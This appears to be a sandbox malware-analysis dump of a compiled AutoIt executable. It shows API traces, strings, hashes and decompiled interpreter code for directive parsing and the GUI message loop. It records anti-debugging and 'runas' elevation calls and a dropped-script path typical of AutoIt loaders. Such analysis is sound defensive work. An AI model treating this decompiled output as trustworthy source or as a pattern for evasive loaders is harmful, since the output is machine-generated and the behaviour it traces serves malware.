                APIs
                  • Part of subcall function 003F1D10: _wcslen.LIBCMT ref: 003F1D11
                  • Part of subcall function 003F1D10: _memmove.LIBCMT ref: 003F1D57
                • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 003F3681
                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 003F3697
                • __wsplitpath.LIBCMT ref: 003F36C2
                  • Part of subcall function 0040392E: __wsplitpath_helper.LIBCMT ref: 00403970
                • _wcscpy.LIBCMT ref: 003F36D7
                • _wcscat.LIBCMT ref: 003F36EC
                • SetCurrentDirectoryW.KERNELBASE(?), ref: 003F36FC
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401546
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401560
                  • Part of subcall function 004014F7: __CxxThrowException@8.LIBCMT ref: 00401571
                  • Part of subcall function 003F3D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,003F378C,?,?,?,00000010), ref: 003F3D38
                  • Part of subcall function 003F3D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 003F3D71
                • _wcscpy.LIBCMT ref: 003F37D0
                • _wcslen.LIBCMT ref: 003F3853
                • _wcslen.LIBCMT ref: 003F38AD
                Strings
                • Unterminated string, xrefs: 004182C6
                • _, xrefs: 003F394C
                • Error opening the file, xrefs: 004181AF
                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0041817E
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                • API String ID: 3393021363-188983378
                • Opcode ID: 15310c2ab625d600a1940cd6354b9a26d5adddf7d9102e069c97323c074f384f
                • Instruction ID: 11be5aa0be299bea98a138cce7f032ef485e46d36ac6dbc0abf6f9abb2b5322c
                • Opcode Fuzzy Hash: 15310c2ab625d600a1940cd6354b9a26d5adddf7d9102e069c97323c074f384f
                • Instruction Fuzzy Hash: 32D1F3B2508345AAD712EF64C841AFFB7E8AF85304F00482EF6C557251DBB8DA49C7A3
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 003FD7BA
                  • Part of subcall function 003F2190: __wcsicoll.LIBCMT ref: 003F2262
                  • Part of subcall function 003F2190: __wcsicoll.LIBCMT ref: 003F2278
                  • Part of subcall function 003F2190: __wcsicoll.LIBCMT ref: 003F228E
                  • Part of subcall function 003F2190: __wcsicoll.LIBCMT ref: 003F22A4
                  • Part of subcall function 003F2190: _wcscpy.LIBCMT ref: 003F22C4
                • IsDebuggerPresent.KERNEL32 ref: 003FD7C6
                • GetFullPathNameW.KERNEL32(C:\Users\user\31956653\thjfdg.xcp,00000104,?,00497F50,00497F54), ref: 003FD82D
                  • Part of subcall function 003F16A0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 003F16E5
                • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 003FD8A2
                • MessageBoxA.USER32 ref: 0041E14F
                • SetCurrentDirectoryW.KERNEL32(?), ref: 0041E1A3
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0041E1D3
                • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0041E21D
                • ShellExecuteW.SHELL32(00000000), ref: 0041E224
                  • Part of subcall function 004003E0: GetSysColorBrush.USER32(0000000F), ref: 004003EB
                  • Part of subcall function 004003E0: LoadCursorW.USER32(00000000,00007F00), ref: 004003FA
                  • Part of subcall function 004003E0: LoadIconW.USER32 ref: 00400410
                  • Part of subcall function 004003E0: LoadIconW.USER32 ref: 00400423
                  • Part of subcall function 004003E0: LoadIconW.USER32 ref: 00400436
                  • Part of subcall function 004003E0: LoadImageW.USER32 ref: 0040045E
                  • Part of subcall function 004003E0: RegisterClassExW.USER32 ref: 004004AD
                  • Part of subcall function 00400350: CreateWindowExW.USER32 ref: 00400385
                  • Part of subcall function 00400350: CreateWindowExW.USER32 ref: 004003AE
                  • Part of subcall function 00400350: ShowWindow.USER32(?,00000000), ref: 004003C4
                  • Part of subcall function 00400350: ShowWindow.USER32(?,00000000), ref: 004003CE
                  • Part of subcall function 003FE2C0: _memset.LIBCMT ref: 003FE2E2
                  • Part of subcall function 003FE2C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003FE3A7
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: LoadWindow$Icon__wcsicoll$CurrentDirectoryName$CreateFullPathShow$BrushClassColorCursorDebuggerExecuteFileForegroundImageMessageModuleNotifyPresentRegisterShellShell__memset_wcscpy
                • String ID: AutoIt$C:\Users\user\31956653\thjfdg.xcp$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                • API String ID: 765478012-3455668180
                • Opcode ID: 47e80feaa5504617361ad7790fe7c7e717f84a5a4710bc1d54ddf44491bed532
                • Instruction ID: 0cdfce2b71f1f2f9ed3693d7b06c1704512e1990cd5c4c9cc91527ccd5f57933
                • Opcode Fuzzy Hash: 47e80feaa5504617361ad7790fe7c7e717f84a5a4710bc1d54ddf44491bed532
                • Instruction Fuzzy Hash: 2B410B71608248BBDB12A7E4DD49BF93B789B58710F1040BAFB4967291CBB849C4C72D
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNELBASE(uxtheme.dll,003FEE15,003FD92E), ref: 003FEE3B
                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 003FEE4D
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: IsThemeActive$uxtheme.dll
                • API String ID: 2574300362-3542929980
                • Opcode ID: 82eaac2e90c88e2c6a10c675516e9789ba775925eeb2d9fa52740bcc4715997f
                • Instruction ID: c1771601709cb5c2f68b652b14cda58a5b240d15a698fcf932e3d98917388004
                • Opcode Fuzzy Hash: 82eaac2e90c88e2c6a10c675516e9789ba775925eeb2d9fa52740bcc4715997f
                • Instruction Fuzzy Hash: 8CD0C9B4940B07DAE7310F35D90972277E4BB50B51F218829AAA9E1160DBB8C4808A29
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetFileAttributesW.KERNELBASE(?,00000000), ref: 004239AC
                • FindFirstFileW.KERNELBASE(?,?), ref: 004239BD
                • FindClose.KERNEL32(00000000), ref: 004239D0
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: FileFind$AttributesCloseFirst
                • String ID:
                • API String ID: 48322524-0
                • Opcode ID: df71a782d1bbdc135ea6711509c7469c5900009e0f58bb8ee8b75a6340231c72
                • Instruction ID: 2d2732692b1fcafc73bcf5e046e0962f7c118b2c0380f6eb813805e5131dd533
                • Opcode Fuzzy Hash: df71a782d1bbdc135ea6711509c7469c5900009e0f58bb8ee8b75a6340231c72
                • Instruction Fuzzy Hash: 1FE092729145189B8610AA78BC094EA77ACEF06336F800763FE3CC21D0D7B49AD087DA
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 57%
                			E003F3C50(char* __ecx, void* __edx, void* __fp0, char _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                				char _v8196;
                				void* __ebx;
                				void* __edi;
                				signed int _t44;
                				intOrPtr _t45;
                				intOrPtr _t46;
                				intOrPtr _t47;
                				intOrPtr _t48;
                				intOrPtr _t49;
                				intOrPtr _t50;
                				intOrPtr _t51;
                				intOrPtr _t58;
                				intOrPtr _t59;
                				intOrPtr _t60;
                				intOrPtr _t62;
                				intOrPtr _t64;
                				signed int _t65;
                				void* _t67;
                				intOrPtr _t68;
                				signed int _t72;
                				intOrPtr _t76;
                				signed int _t86;
                				char* _t96;
                				intOrPtr _t101;
                				void* _t116;
                				intOrPtr* _t117;
                				void* _t119;
                				short* _t120;
                				signed int _t121;
                				void* _t122;
                				void* _t123;
                				void* _t124;
                				void* _t125;
                				void* _t126;
                				void* _t127;
                				void* _t128;
                				void* _t129;
                				void* _t130;
                
                				_t134 = __fp0;
                				_t98 = __ecx;
                				E00412160(0x2004);
                				_t120 = _a4;
                				if( *_t120 == 0x23) {
                					_t96 = __ecx;
                					_t44 = E0040333F(_t120, L"#notrayicon", 0xb);
                					_t124 = _t123 + 0xc;
                					__eflags = _t44;
                					if(_t44 != 0) {
                						_t45 = E0040333F(_t120, L"#requireadmin", 0xd);
                						_t125 = _t124 + 0xc;
                						__eflags = _t45;
                						if(_t45 != 0) {
                							_t46 = E0040333F(_t120, L"#NoAutoIt3Execute", 0xd);
                							_t126 = _t125 + 0xc;
                							__eflags = _t46;
                							if(_t46 != 0) {
                								_t47 = E0040333F(_t120, L"#OnAutoItStartRegister", 0x16);
                								_t127 = _t126 + 0xc;
                								__eflags = _t47;
                								if(__eflags != 0) {
                									_t48 = E0040333F(_t120, L"#include-once", 0xd);
                									_t128 = _t127 + 0xc;
                									__eflags = _t48;
                									if(_t48 != 0) {
                										_t49 = E0040333F(_t120, L"#include", 8);
                										_t129 = _t128 + 0xc;
                										__eflags = _t49;
                										if(_t49 != 0) {
                											_t50 = E0040333F(_t120, L"#comments-start", 0xf);
                											_t130 = _t129 + 0xc;
                											__eflags = _t50;
                											if(__eflags == 0) {
                												L28:
                												_t117 = _a12;
                												_a4 = 1;
                												while(1) {
                													_t51 = E0045FD26(__eflags, _a16, _t120); // executed
                													__eflags = _t51;
                													if(__eflags == 0) {
                														break;
                													}
                													 *_t117 =  *_t117 + 1;
                													E00434AA0(_t98, __eflags, _t120);
                													E00434A44(_t98, _t120);
                													_t58 = E0040333F(_t120, L"#comments-start", 0xf);
                													_t130 = _t130 + 0xc;
                													__eflags = _t58;
                													if(__eflags == 0) {
                														L36:
                														_a4 = _a4 + 1;
                														continue;
                													}
                													_t59 = E0040333F(_t120, L"#cs", 3);
                													_t130 = _t130 + 0xc;
                													__eflags = _t59;
                													if(__eflags == 0) {
                														goto L36;
                													}
                													_t60 = E0040333F(_t120, L"#comments-end", 0xd);
                													_t130 = _t130 + 0xc;
                													__eflags = _t60;
                													if(_t60 == 0) {
                														L34:
                														_t62 = _a4 - 1;
                														_a4 = _t62;
                														__eflags = _t62;
                														if(__eflags > 0) {
                															continue;
                														}
                														return 1;
                													}
                													_t64 = E0040333F(_t120, L"#ce", 3);
                													_t130 = _t130 + 0xc;
                													__eflags = _t64;
                													if(__eflags != 0) {
                														continue;
                													}
                													goto L34;
                												}
                												__eflags = _a4;
                												if(__eflags <= 0) {
                													L5:
                													return 1;
                												}
                												E00443F89(__eflags, _t134, _t96, _a8,  *_t117, L"Unterminated group of comments", _t120);
                												return 0;
                											}
                											_t65 = E0040333F(_t120, L"#cs", 3);
                											_t130 = _t130 + 0xc;
                											__eflags = _t65;
                											if(__eflags != 0) {
                												goto L5;
                											}
                											goto L28;
                										}
                										_push( &_v8196);
                										_push(_t120 + 0x10);
                										_push(_t96);
                										_t67 = E00434AE1();
                										_t101 = _a8;
                										__eflags = _t67 - 1;
                										_t68 =  *_a12;
                										if(__eflags != 0) {
                											E00443F89(__eflags, __fp0, _t96, _t101, _t68, L"Cannot parse #include", _t120);
                											return 0;
                										}
                										_push(_t68);
                										_push(_t120);
                										_push(_t101);
                										_push(E003FF290(_t96,  &_v8196, _t116));
                										_push( &_v8196);
                										_push(_t96);
                										_t72 = E003F35F0( &_v8196, __fp0);
                										__eflags = _t72;
                										return 0 | _t72 != 0x00000000;
                									}
                									__eflags =  *((intOrPtr*)(_t96 + 0x20)) - _t48;
                									if( *((intOrPtr*)(_t96 + 0x20)) <= _t48) {
                										goto L5;
                									}
                									_t121 = 0;
                									__eflags = 0;
                									while(1) {
                										_t76 = E004013CB(_t116,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x1c)) + _t121 * 4)))), _a8);
                										_t128 = _t128 + 8;
                										__eflags = _t76;
                										if(_t76 == 0) {
                											break;
                										}
                										_t121 = _t121 + 1;
                										__eflags = _t121 -  *((intOrPtr*)(_t96 + 0x20));
                										if(_t121 <  *((intOrPtr*)(_t96 + 0x20))) {
                											continue;
                										}
                										return 1;
                									}
                									__eflags =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x2c)) + _t121 * 4)))) - 1;
                									return ((0 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x2c)) + _t121 * 4)))) - 0x00000001 <= 0x00000000) - 0x00000001 & 0x00000003) + 1;
                								}
                								_t122 = E003FF260(_t120 + 0x2c, __eflags);
                								E00434A44(_t98, _t122);
                								E00434AA0(_t98, __eflags, _t122);
                								_t86 = E004010E1(_t122);
                								__eflags =  *((short*)(_t122 + _t86 * 2 - 2)) - 0x22;
                								if( *((short*)(_t122 + _t86 * 2 - 2)) != 0x22) {
                									_push(_t122);
                								} else {
                									_t8 = _t122 + 2; // 0x2
                									_t119 = _t8;
                									 *((short*)(_t122 + _t86 * 2 - 2)) = 0;
                									E00434A44(0, _t119);
                									E00434AA0(0, __eflags, _t119);
                									_push(_t119);
                								}
                								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t96 + 4)))) + 8))))();
                								_push(_t122);
                								E004010FC();
                								return 1;
                							}
                							 *((char*)(_t96 + 2)) = 1;
                							return 1;
                						}
                						 *((char*)(_t96 + 1)) = 1;
                						return 1;
                					}
                					 *_t96 = 1;
                					goto L5;
                				}
                				return 3;
                			}










































                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp
                Similarity
                • API ID: __wcsnicmp
                • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                • API String ID: 1038674560-3360698832
                • Opcode ID: f0767252081d9bfd50b5071e1d6400066294abdc9c1f6355d762680a224a907f
                • Instruction ID: 02615d96a5aeaeb606cd5a47dd309ffc6dfa86213e4ba3480039bc4d322a3126
                • Opcode Fuzzy Hash: f0767252081d9bfd50b5071e1d6400066294abdc9c1f6355d762680a224a907f
                • Instruction Fuzzy Hash: 4A61E8B0640715B6E711AA21CC42FEB335C9F55744F14802FFD05AA282EFBDEB8586AD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E003F9430(struct tagMSG* __ecx, struct tagMSG* __edx, void* __fp0, signed int _a4) {
                				struct tagMSG _v32;
                				char _v48;
                				char _v64;
                				char _v80;
                				char _v96;
                				char _v100;
                				char _v104;
                				char _v108;
                				char _v112;
                				char _v116;
                				char _v120;
                				char _v124;
                				char _v128;
                				char _v132;
                				char _v136;
                				char _v140;
                				char _v144;
                				intOrPtr _v152;
                				int _v156;
                				char _v164;
                				struct tagMSG _v188;
                				struct HWND__* _v192;
                				int _v196;
                				struct HWND__* _v204;
                				char _v208;
                				struct HWND__* _v220;
                				struct tagMSG _v244;
                				char _v248;
                				char _v252;
                				long _v256;
                				long _v260;
                				struct HWND__* _v264;
                				int _v268;
                				struct HWND__* _v272;
                				signed int _v276;
                				char _v277;
                				char _v288;
                				int _v292;
                				struct HWND__* _v300;
                				struct HWND__* _v304;
                				struct HWND__* _v308;
                				struct tagMSG* _v312;
                				char _v316;
                				long _v324;
                				signed int _v328;
                				char _v329;
                				struct HWND__* _v332;
                				struct tagMSG* _v336;
                				void* __ebx;
                				void* __edi;
                				signed int __esi;
                				intOrPtr _t280;
                				int _t282;
                				intOrPtr _t283;
                				struct tagMSG* _t285;
                				struct HWND__* _t291;
                				struct HWND__* _t295;
                				intOrPtr* _t297;
                				struct HWND__* _t299;
                				struct HWND__* _t302;
                				struct HWND__* _t307;
                				struct HWND__* _t329;
                				struct HWND__* _t331;
                				struct HWND__* _t336;
                				struct HWND__* _t337;
                				struct HWND__* _t338;
                				struct HWND__* _t342;
                				struct HWND__* _t347;
                				void* _t349;
                				struct HWND__* _t355;
                				struct tagMSG* _t358;
                				long _t359;
                				void* _t368;
                				void* _t379;
                				void* _t380;
                				struct tagMSG* _t384;
                				signed int _t385;
                				void* _t400;
                				signed int _t403;
                				void* _t405;
                				int _t406;
                				void* _t407;
                				struct HWND__* _t414;
                				int _t415;
                				struct HWND__* _t417;
                				struct HWND__* _t423;
                				intOrPtr _t431;
                				struct HWND__* _t437;
                				struct HWND__* _t442;
                				intOrPtr _t460;
                				void* _t462;
                				struct tagMSG* _t467;
                				signed int _t480;
                				struct tagMSG* _t511;
                				signed int _t545;
                				void* _t549;
                				struct tagMSG** _t552;
                				struct HWND__** _t553;
                				struct tagMSG* _t560;
                				struct HWND__* _t564;
                				struct HWND__* _t565;
                				signed int _t566;
                				signed int _t570;
                				struct HWND__** _t572;
                				void* _t598;
                
                				_t606 = __fp0;
                				_t511 = __edx;
                				_t471 = __ecx;
                				_t572 = (_t570 & 0xfffffff8) - 0x14c;
                				_t533 = __ecx;
                				_t280 =  *((intOrPtr*)(__ecx + 0xec));
                				if(_t280 >= 0xf3c) {
                					 *0x4874e2 = 0;
                					E0044E724(__fp0, __ecx, 0x9a, 0xffffffff);
                					_t282 = 1;
                					L33:
                					return _t282;
                				}
                				_t283 = _t280 + 1;
                				_v312 = __ecx;
                				 *((intOrPtr*)(__ecx + 0xec)) = _t283;
                				if(_t283 == 1) {
                					E003FFFF0(__ecx, __fp0);
                				}
                				_t533[0x51] = 0;
                				if(_t533[0x3f] != 0) {
                					L30:
                					_t285 = _t533[0x3b];
                					_t533[0x51] = 0;
                					if(_t285 == 1) {
                						E003FFF70(_t471, _t533);
                						__eflags = _t533[0x3f] - 1;
                						if(__eflags == 0) {
                							goto L32;
                						}
                						E003F1C50(_t533, _t511, __eflags, _t606);
                						LockWindowUpdate(0);
                						DestroyWindow( *0x487518); // executed
                						_t291 = GetMessageW( &_v32, 0, 0, 0);
                						__eflags = _t291;
                						if(_t291 <= 0) {
                							goto L32;
                						}
                						do {
                							TranslateMessage( &_v32);
                							DispatchMessageW( &_v32);
                							_t295 = GetMessageW( &_v32, 0, 0, 0);
                							__eflags = _t295;
                						} while (_t295 > 0);
                						goto L32;
                					} else {
                						_t533[0x3b] = _t285 - 1;
                						L32:
                						_t282 = 0;
                						goto L33;
                					}
                				} else {
                					while(_t533[0x51] == 0) {
                						if( *0x4874e3 != 0) {
                							L10:
                							if( *0x498624 != 0) {
                								_t297 =  *0x498628; // 0x0
                								_t460 =  *_t297;
                								E00421D6C();
                								_t299 = _t533[0x6c];
                								_t545 = 0;
                								__eflags = _t299;
                								if(_t299 == 0) {
                									L80:
                									__eflags = _t545 - _t299;
                									if(__eflags == 0) {
                										goto L11;
                									}
                									E00454D61( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t533[0x6b] + _t545 * 4)))) + 8)),  *((intOrPtr*)(_t533[0x6b] + _t545 * 4)), __eflags, _t533,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t533[0x6b] + _t545 * 4)))) + 8)),  &_v252,  &_v112,  &_v100,  &_v136);
                									_t511 = _t533[0x6b];
                									_t471 =  *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18;
                									_v276 =  &(_v276->i);
                									E003FDE00( &(_t533[0x53]),  *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18);
                									E0046D2F8( *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18, _t511, _t606, _t533,  &(_v276->i), 1, 0);
                									L29:
                									if(_t533[0x3f] == 0) {
                										continue;
                									}
                									goto L30;
                								}
                								_t471 = _t533[0x6b];
                								do {
                									_t511 = _t471->hwnd;
                									__eflags = _t511->hwnd;
                									if(_t511->hwnd == 0) {
                										goto L79;
                									}
                									_t511 = _t511->hwnd;
                									__eflags = _t511->hwnd - _t460;
                									if(_t511->hwnd == _t460) {
                										goto L80;
                									}
                									L79:
                									_t545 = _t545 + 1;
                									_t471 =  &(_t471->message);
                									__eflags = _t545 - _t533[0x6c];
                								} while (_t545 < _t533[0x6c]);
                								goto L80;
                							}
                							L11:
                							if( *0x4874ec == 1) {
                								__eflags =  *0x4874e3;
                								if( *0x4874e3 != 0) {
                									goto L12;
                								}
                								Sleep(0xa);
                								goto L29;
                							}
                							L12:
                							if(_t533[0x118] != 0) {
                								__eflags =  *0x49954c;
                								if( *0x49954c != 0) {
                									goto L13;
                								}
                								_t467 = _t533[0x116];
                								 *0x49954c = 1;
                								_v308 = 0;
                								_v328 = _t467;
                								while(1) {
                									_t511 =  &_v328;
                									 *_t572 = 0;
                									_t329 = E004307BC(_t511, _t471);
                									__eflags = _t329;
                									if(_t329 == 0) {
                										goto L93;
                									}
                									_t347 = _t467->hwnd;
                									__eflags =  *((char*)(_t347 + 0x11));
                									if( *((char*)(_t347 + 0x11)) != 0) {
                										L92:
                										_t471 =  &_v324;
                										E004307CE( &_v328,  &_v324);
                										_t467 = _v336;
                										continue;
                									}
                									_v324 = _t347;
                									_t349 = E003FC870( *((intOrPtr*)(_t347 + 0x14)));
                									__eflags = _t511;
                									if(__eflags < 0) {
                										goto L92;
                									}
                									if(__eflags > 0) {
                										L91:
                										_v308 =  &(_v308->i);
                										 *((intOrPtr*)(_t467->hwnd + 0x14)) = timeGetTime();
                										E00454D61(_t467,  &_v248, __eflags, _t533, _t467,  &_v248,  &_v128,  &_v144,  &_v140);
                										_t355 =  &(_v272->i);
                										__eflags = _t355;
                										_v272 = _t355;
                										 *((char*)(_t467->hwnd + 0x10)) = 1;
                										E0046D2F8(_t467, _t467->hwnd, _t606, _t533, _t355, 1, 0);
                										 *((char*)(_t467->hwnd + 0x10)) = 0;
                										goto L92;
                									}
                									__eflags = _t349 -  *((intOrPtr*)(_v324 + 0x18));
                									if(__eflags < 0) {
                										goto L92;
                									}
                									goto L91;
                								}
                								while(1) {
                									L93:
                									_v328 = _t533[0x116];
                									while(1) {
                										L94:
                										_t471 =  &_v328;
                										 *_t572 = 0;
                										_t331 = E004307BC( &_v328,  &_v328);
                										__eflags = _t331;
                										if(_t331 == 0) {
                											break;
                										}
                										_t511 = _v328;
                										_t342 = _t511->hwnd;
                										__eflags =  *((char*)(_t342 + 0x11));
                										if( *((char*)(_t342 + 0x11)) != 0) {
                											E00442129( &(_t533[0x116]),  &_v328);
                											L93:
                											_v328 = _t533[0x116];
                											continue;
                										}
                										_t471 =  &_v324;
                										_t511 =  &_v328;
                										E004307CE(_t511,  &_v324);
                									}
                									__eflags = _v308;
                									 *0x49954c = 0;
                									if(_v308 > 0) {
                										goto L29;
                									}
                									goto L13;
                								}
                							}
                							L13:
                							if( *0x49863c != 0) {
                								__eflags = _t533[0x119] - 1;
                								if(_t533[0x119] == 1) {
                									goto L14;
                								}
                								__eflags =  *0x498668 - 1;
                								if( *0x498668 == 1) {
                									goto L14;
                								}
                								E00437DD1( &_v244);
                								while(1) {
                									_t511 =  &_v244;
                									_t302 = E00441700(0x498630, _t511);
                									__eflags = _t302;
                									if(_t302 == 0) {
                										break;
                									}
                									__eflags = E00424A5A( &(_v244.message));
                									if(__eflags != 0) {
                										continue;
                									}
                									_t307 = E00454D61( &_v208, _v244.message, __eflags, _t533, _v244.message,  &_v208,  &_v132,  &_v120,  &_v104);
                									__eflags = _t307;
                									if(_t307 == 0) {
                										continue;
                									}
                									_v300 = 0;
                									_v292 = 1;
                									_v288 = 0;
                									E003F9190(1,  &_v300);
                									_v292 = 1;
                									_v300 = _v244.hwnd;
                									E003F1D10(L"@GUI_CTRLID",  &_v96, __eflags);
                									E003F1BE0(2, 1,  &_v300,  &_v96);
                									E003F2480( &_v96);
                									E003F9190(L"@GUI_CTRLID",  &_v300);
                									_v292 = 7;
                									_v300 = _v244.pt;
                									E003F1D10(L"@GUI_WINHANDLE",  &_v64, __eflags);
                									E003F1BE0(2, 1,  &_v300,  &_v64);
                									E003F2480( &_v64);
                									E003F9190(L"@GUI_WINHANDLE",  &_v300);
                									_t536 = L"@GUI_CTRLHANDLE";
                									_t559 =  &_v48;
                									_v292 = 7;
                									_v300 = _v220;
                									E003F1D10(L"@GUI_CTRLHANDLE",  &_v48, __eflags);
                									_t511 =  &_v300;
                									E003F1BE0(2, 1, _t511,  &_v48);
                									E003F2480( &_v48);
                									_t560 = _v312;
                									 *((char*)(_t560 + 0x464)) = 1;
                									E0046D2F8(_t559, _t511, _t606, _t560, _v208 + 1, 1, 0);
                									 *((char*)(_t560 + 0x464)) = 0;
                									_t553 =  &_v316;
                									L108:
                									E003F9190(_t536, _t553);
                									_t471 =  &(_v244.message);
                									E003F2480( &(_v244.message));
                									_t533 = _v312;
                									goto L29;
                								}
                								_t471 =  &(_v244.message);
                								E003F2480( &(_v244.message));
                							}
                							L14:
                							if(E003F9400(_t511, _t606, _t533) == 1) {
                								goto L29;
                							}
                							if( *0x4987b0 != 0) {
                								__eflags = _t533[0x119] - 1;
                								if(_t533[0x119] == 1) {
                									goto L16;
                								}
                								E00437DD1( &_v244);
                								while(1) {
                									_t511 =  &_v244;
                									_t437 = E00443B3B(0x498710, _t511);
                									__eflags = _t437;
                									if(_t437 == 0) {
                										break;
                									}
                									__eflags = E00424A5A( &(_v244.message));
                									if(__eflags != 0) {
                										continue;
                									}
                									_t442 = E00454D61( &(_v188.pt), _v244.message, __eflags, _t533, _v244.message,  &(_v188.pt),  &_v108,  &_v124,  &_v116);
                									__eflags = _t442;
                									if(_t442 == 0) {
                										continue;
                									}
                									_v204 = 0;
                									_v196 = 1;
                									_v192 = 0;
                									E003F9190(1,  &_v204);
                									_v196 = 1;
                									_t536 = L"@TRAY_ID";
                									_v204 = _v244.hwnd;
                									E003F1D10(L"@TRAY_ID",  &_v80, __eflags);
                									_t511 =  &_v204;
                									E003F1BE0(2, 1, _t511,  &_v80);
                									E003F2480( &_v80);
                									_t552 = _v312;
                									__eflags = _v188.pt + 1;
                									_t552[0x119] = 1;
                									E0046D2F8(_v188.pt + 1, _t511, _t606, _t552, _v188.pt + 1, 1, 0);
                									_t552[0x119] = 0;
                									_t553 =  &_v220;
                									goto L108;
                								}
                								_t471 =  &(_v244.message);
                								E003F2480( &(_v244.message));
                							}
                							L16:
                							_t358 = _t533[0x3e];
                							if(_t358 == 7) {
                								_t511 = _t533[0x114];
                								_t359 = WaitForSingleObject(_t511, 0xa);
                								_v256 = _t359;
                								__eflags = _t359 - 0x102;
                								if(_t359 != 0x102) {
                									GetExitCodeProcess(_t533[0x114],  &_v256);
                									_t511 = _t533[0x114];
                									CloseHandle(_t511);
                									_v324 = _v256;
                									_t471 = _t533 +  *_t533->message;
                									E003FD620( &_v324, _t533 +  *_t533->message);
                									_t533[0x51] = 1;
                									_t533[0x3e] = 0;
                								}
                								goto L29;
                							}
                							if(_t358 == 8 || _t358 == 9) {
                								Sleep(0xa);
                								__eflags = _t533[0x112];
                								if(_t533[0x112] == 0) {
                									__eflags = 0;
                									L127:
                									_t511 = _t533[0x10e];
                									_t471 =  &_v304;
                									E00433C1D(_t511,  &_v304,  &_v329);
                									_t572 =  &(_t572[3]);
                									__eflags = _t533[0x3e] - 9;
                									if(_t533[0x3e] != 9) {
                										__eflags = _v329 - 1;
                										if(_v329 != 1) {
                											goto L29;
                										}
                										_t462 = 0;
                										__eflags = 0;
                										L133:
                										_t368 = _t533[0x115];
                										_v260 = 0xcccccccc;
                										__eflags = _t368 - _t462;
                										if(_t368 != _t462) {
                											GetExitCodeProcess(_t368,  &_v260);
                											CloseHandle(_t533[0x115]);
                											_t533[0x115] = _t462;
                										}
                										__eflags = _t533[0x3e] - 8;
                										if(_t533[0x3e] != 8) {
                											_t511 =  *_t533;
                											_t471 = _v260;
                											__eflags = _t533 + _t511->message;
                											E003F3F00(_t533 + _t511->message, _v260, _t462);
                										} else {
                											asm("fild dword [esp+0x2c]");
                											__eflags = _v304;
                											if(_v304 < 0) {
                												_t606 = _t606 +  *0x47cd00;
                											}
                											_t511 =  *_t533;
                											_v324 = _t606;
                											_t471 =  &_v324;
                											E0044742B(_t533 + _t511->message,  &_v324);
                										}
                										_t533[0x51] = 1;
                										_t533[0x3e] = _t462;
                										Sleep(_t533[0xbd]);
                										goto L29;
                									}
                									__eflags = _v329;
                									if(_v329 != 0) {
                										_v329 = 0;
                										goto L29;
                									}
                									_v329 = 1;
                									goto L133;
                								}
                								_t379 = E003FC870(_t533[0x113]);
                								_t462 = 0;
                								__eflags = _t511;
                								if(__eflags < 0) {
                									goto L127;
                								}
                								if(__eflags > 0) {
                									L123:
                									_t380 = _t533[0x115];
                									__eflags = _t380 - _t462;
